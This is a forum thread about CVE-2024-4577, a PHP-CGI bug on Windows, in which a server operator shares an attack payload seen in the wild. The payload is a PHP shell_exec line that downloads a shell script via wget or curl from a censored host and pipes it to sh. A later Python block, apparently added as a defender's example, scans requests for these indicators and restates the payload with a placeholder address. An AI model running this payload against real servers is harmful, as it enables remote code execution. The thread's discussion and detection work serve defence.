CVE-2024-4577 PHP bug

Two comments about this:

  1. Be aware that it is around, particularly if you actually run PHP.

Description from CVE record dated 9 June:

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

(I can see that it says “Windows” but it can’t always be assumed that the bug will never work on Linux. In this particular case it seems as if it could really be Windows-specific.)

  2. My web server saw an occurrence of this, with the PHP code being
<?php shell_exec("SC=$(wget -O- http://aa.bb.cc.dd/sh || curl http://aa.bb.cc.dd/sh); echo \"\$SC\" | sh -s cve_2024_4577"); echo(md5("Hello CVE-2024-4577")); ?>

(where I’ve censored the IP address from which some dodgy first stage shell script will be downloaded)

So is this black hat and the vulnerability is being exploited in the wild and the hacker has a sense of humour (to point me directly at the correct CVE number)

or is this white hat attempting to locate vulnerable servers and warn them?

I think black hat.

(I’ve chosen not to exhibit the URL that is actually sent to the web server in order to trigger this bug.)

2 Likes
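As an added defender's-side example (not code from the original post or this thread), the following Python checks a PHP version against the fixed releases named in the quoted CVE record and scans a URL-encoded request for the second-stage indicators visible in the observed payload; 192.0.2.1 stands in for the censored address, and the scanner deliberately matches only the observed PHP code, not the trigger URL the poster withheld.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Fixed releases named in the quoted CVE record: 8.1.29, 8.2.20, 8.3.8.
FIXED = {(8, 1): (8, 1, 29), (8, 2): (8, 2, 20), (8, 3): (8, 3, 8)}

def is_unpatched(version: str) -> bool:
    """True when an 8.1/8.2/8.3 version predates its fixed release.
    Branches the CVE record does not list (e.g. 8.0.x) return False."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return False
    parts = tuple(int(g) for g in m.groups())
    fixed = FIXED.get(parts[:2])
    return fixed is not None and parts < fixed

# Indicators taken from the second-stage PHP code the poster observed.
INDICATORS = {
    "shell_exec": re.compile(r"shell_exec\s*\("),
    "download_pipe_sh": re.compile(r"(wget\s+-O-|curl)\s+\S+.*\|\s*sh\b"),
    "md5_canary": re.compile(r"echo\s*\(\s*md5\s*\("),  # "did it work?" marker
    "cve_string": re.compile(r"cve[-_]2024[-_]4577", re.I),
}

def scan_request(raw: str) -> list[str]:
    """Return the indicator names present in one URL-encoded query or body."""
    decoded = unquote_plus(raw)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

# Constructed samples: the observed payload with 192.0.2.1 standing in for the
# censored address, encoded as it would arrive in a request, plus a benign one.
OBSERVED = ('<?php shell_exec("SC=$(wget -O- http://192.0.2.1/sh || curl '
            'http://192.0.2.1/sh); echo \\"\\$SC\\" | sh -s cve_2024_4577"); '
            'echo(md5("Hello CVE-2024-4577")); ?>')
SAMPLE_MALICIOUS = quote_plus(OBSERVED)
SAMPLE_BENIGN = "page=about&lang=en"

if __name__ == "__main__":
    print("8.2.19 unpatched:", is_unpatched("8.2.19"))
    print("malicious:", scan_request(SAMPLE_MALICIOUS))
    print("benign:", scan_request(SAMPLE_BENIGN))
```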

I am pretty confident that their message was to indicate to themselves whether or not their exploit was successful, although if I had to assume a role of a malicious attacker, I would not disclose the CVE during that process.

1 Like

Yes, code like echo(md5("Hello CVE-2024-4577")) is quite common - to show with overwhelming probability that the exploit worked - but the string being hashed would not usually be the CVE number. 🙂

One observation is that at the time that an exploit first commences, the hacker would not know the CVE number. So this is either a copycat attack or it’s white hat. My thinking is: a copycat attack derived in part or in full from the now released fix or information.

1 Like